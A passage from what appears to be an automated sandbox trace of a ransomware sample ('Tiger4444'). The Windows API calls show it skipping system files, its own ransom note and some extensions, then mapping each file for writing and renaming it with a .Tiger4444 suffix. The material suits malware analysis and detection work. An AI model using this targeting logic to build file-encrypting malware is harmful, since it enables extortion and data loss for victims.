BACK YOUR FILES.txt") returned 1 [0041.746] lstrcmpiW (lpString1="loading.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.746] lstrcmpiW (lpString1="loading.gif", lpString2="Tiger4444.exe") returned -1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2=".") returned 1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="..") returned 1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="windows") returned -1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="bootmgr") returned 1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="pagefile.sys") returned -1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="boot") returned 1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="ids.txt") returned 1 [0041.747] lstrcmpiW (lpString1="loading.gif", lpString2="NTUSER.DAT") returned -1 [0041.747] lstrcpyW (in: lpString1=0x30aeaea, lpString2="loading.gif" | out: lpString1="loading.gif") returned="loading.gif" [0041.747] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif", dwFileAttributes=0x0) returned 1 [0041.747] lstrlenW (lpString="loading.gif") returned 11 [0041.747] lstrlenW (lpString="Tiger4444") returned 9 [0041.747] lstrcmpiW (lpString1="ading.gif", lpString2="Tiger4444") returned -1 [0041.747] lstrlenW (lpString=".dll") returned 4 [0041.747] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0041.747] lstrlenW (lpString=".lnk") returned 4 [0041.747] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0041.747] lstrlenW (lpString=".ini") returned 4 [0041.747] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0041.747] lstrlenW (lpString=".sys") returned 4 [0041.747] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0041.747] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.747] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.747] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13320059883) returned 1 [0041.748] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=17395) returned 1 [0041.748] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0041.748] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0041.748] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4700, lpName=0x0) returned 0x2c8 [0041.749] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4700) returned 0xbe0000 [0041.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0041.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0041.764] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13321712645) returned 1 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0041.764] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0041.764] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.764] CloseHandle (hObject=0x2c8) returned 1 [0041.764] CloseHandle (hObject=0x260) returned 1 [0041.766] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\loading.gif.Tiger4444") returned 54 [0041.766] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif.tiger4444"), dwFlags=0x1) returned 1 [0041.767] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=17408 | out: Addend=0xc6f980) returned 4265904 [0041.767] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=16 | out: Addend=0xc6f98c) returned 2492 [0041.767] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x749e0600, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0xe5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lock.png", cAlternateFileName="")) returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="Tiger4444.exe") returned -1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2=".") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="..") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="windows") returned -1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="bootmgr") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="pagefile.sys") returned -1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="boot") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="ids.txt") returned 1 [0041.767] lstrcmpiW (lpString1="lock.png", lpString2="NTUSER.DAT") returned -1 [0041.767] lstrcpyW (in: lpString1=0x30aeaea, lpString2="lock.png" | out: lpString1="lock.png") returned="lock.png" [0041.767] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png", dwFileAttributes=0x0) returned 1 [0041.768] lstrlenW (lpString="lock.png") returned 8 [0041.768] lstrlenW (lpString="Tiger4444") returned 9 [0041.768] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0041.769] lstrlenW (lpString=".dll") returned 4 [0041.769] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.769] lstrlenW (lpString=".lnk") returned 4 [0041.769] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.769] lstrlenW (lpString=".ini") returned 4 [0041.769] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.769] lstrlenW (lpString=".sys") returned 4 [0041.769] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.769] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.769] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.769] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13322195894) returned 1 [0041.769] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3677) returned 1 [0041.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0041.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0041.769] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1160, lpName=0x0) returned 0x2c8 [0041.771] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1160) returned 0xbe0000 [0041.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0041.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0041.772] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13322550444) returned 1 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0041.772] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0041.773] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.773] CloseHandle (hObject=0x2c8) returned 1 [0041.773] CloseHandle (hObject=0x260) returned 1 [0041.774] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\lock.png.Tiger4444") returned 51 [0041.774] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png.tiger4444"), dwFlags=0x1) returned 1 [0041.775] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=3680 | out: Addend=0xc6f980) returned 4283312 [0041.775] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 2508 [0041.775] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xa33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="Tiger4444.exe") returned -1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2=".") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="..") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="windows") returned -1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="bootmgr") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="pagefile.sys") returned -1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="boot") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="ids.txt") returned 1 [0041.775] lstrcmpiW (lpString1="logo.png", lpString2="NTUSER.DAT") returned -1 [0041.775] lstrcpyW (in: lpString1=0x30aeaea, lpString2="logo.png" | out: lpString1="logo.png") returned="logo.png" [0041.775] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png", dwFileAttributes=0x0) returned 1 [0041.776] lstrlenW (lpString="logo.png") returned 8 [0041.776] lstrlenW (lpString="Tiger4444") returned 9 [0041.776] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0041.776] lstrlenW (lpString=".dll") returned 4 [0041.776] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.776] lstrlenW (lpString=".lnk") returned 4 [0041.776] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.776] lstrlenW (lpString=".ini") returned 4 [0041.776] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.776] lstrlenW (lpString=".sys") returned 4 [0041.776] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.776] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.776] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.776] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13322926194) returned 1 [0041.776] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2611) returned 1 [0041.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0041.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0041.776] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd40, lpName=0x0) returned 0x2c8 [0041.777] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0xbe0000 [0041.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0041.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0041.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0041.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0041.799] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13325198388) returned 1 [0041.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0041.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0041.799] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.799] CloseHandle (hObject=0x2c8) returned 1 [0041.799] CloseHandle (hObject=0x260) returned 1 [0041.801] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\logo.png.Tiger4444") returned 51 [0041.801] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png.tiger4444"), dwFlags=0x1) returned 1 [0041.801] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2624 | out: Addend=0xc6f980) returned 4286992 [0041.802] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=22 | out: Addend=0xc6f98c) returned 2511 [0041.802] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="marketing.png", cAlternateFileName="MARKET~1.PNG")) returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="Tiger4444.exe") returned -1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2=".") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="..") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="windows") returned -1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="bootmgr") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="pagefile.sys") returned -1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="boot") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="ids.txt") returned 1 [0041.802] lstrcmpiW (lpString1="marketing.png", lpString2="NTUSER.DAT") returned -1 [0041.802] lstrcpyW (in: lpString1=0x30aeaea, lpString2="marketing.png" | out: lpString1="marketing.png") returned="marketing.png" [0041.802] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png", dwFileAttributes=0x0) returned 1 [0041.802] lstrlenW (lpString="marketing.png") returned 13 [0041.802] lstrlenW (lpString="Tiger4444") returned 9 [0041.802] lstrcmpiW (lpString1="eting.png", lpString2="Tiger4444") returned -1 [0041.802] lstrlenW (lpString=".dll") returned 4 [0041.803] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.803] lstrlenW (lpString=".lnk") returned 4 [0041.803] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.803] lstrlenW (lpString=".ini") returned 4 [0041.803] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.803] lstrlenW (lpString=".sys") returned 4 [0041.803] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.803] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.803] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.803] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13325610434) returned 1 [0041.803] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=493) returned 1 [0041.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0041.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0041.803] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x2c8 [0041.816] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0xbe0000 [0041.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0041.817] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.817] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.817] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.817] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0041.818] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13327065518) returned 1 [0041.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0041.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0041.818] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.818] CloseHandle (hObject=0x2c8) returned 1 [0041.818] CloseHandle (hObject=0x260) returned 1 [0041.819] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\marketing.png.Tiger4444") returned 56 [0041.819] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png.tiger4444"), dwFlags=0x1) returned 1 [0041.820] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=496 | out: Addend=0xc6f980) returned 4289616 [0041.820] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 2533 [0041.820] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea60a72c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WinJS", cAlternateFileName="MICROS~1.WIN")) returned 1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="Tiger4444.exe") returned -1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2=".") returned 1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="..") returned 1 [0041.820] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="windows") returned -1 [0041.821] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="bootmgr") returned 1 [0041.821] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="pagefile.sys") returned -1 [0041.821] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="boot") returned 1 [0041.821] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="ids.txt") returned 1 [0041.821] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="NTUSER.DAT") returned -1 [0041.821] lstrcpyW (in: lpString1=0x30aeaea, lpString2="Microsoft.WinJS" | out: lpString1="Microsoft.WinJS") returned="Microsoft.WinJS" [0041.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0041.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc60fe8 [0041.821] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc665a8 [0041.821] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea627c0d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea627c0d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x97e0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetworkIssueFAQ.mht", cAlternateFileName="NETWOR~1.MHT")) returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="Tiger4444.exe") returned -1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2=".") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="..") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="windows") returned -1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="bootmgr") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="pagefile.sys") returned -1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="boot") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="ids.txt") returned 1 [0041.821] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="NTUSER.DAT") returned -1 [0041.821] lstrcpyW (in: lpString1=0x30aeaea, lpString2="NetworkIssueFAQ.mht" | out: lpString1="NetworkIssueFAQ.mht") returned="NetworkIssueFAQ.mht" [0041.821] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht", dwFileAttributes=0x0) returned 1 [0041.823] lstrlenW (lpString="NetworkIssueFAQ.mht") returned 19 [0041.823] lstrlenW (lpString="Tiger4444") returned 9 [0041.823] lstrcmpiW (lpString1="ueFAQ.mht", lpString2="Tiger4444") returned 1 [0041.823] lstrlenW (lpString=".dll") returned 4 [0041.823] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0041.823] lstrlenW (lpString=".lnk") returned 4 [0041.823] lstrcmpiW (lpString1=".mht", lpString2=".lnk") returned 1 [0041.823] lstrlenW (lpString=".ini") returned 4 [0041.823] lstrcmpiW (lpString1=".mht", lpString2=".ini") returned 1 [0041.823] lstrlenW (lpString=".sys") returned 4 [0041.823] lstrcmpiW (lpString1=".mht", lpString2=".sys") returned -1 [0041.823] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.823] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.823] QueryPerformanceCounter (in: 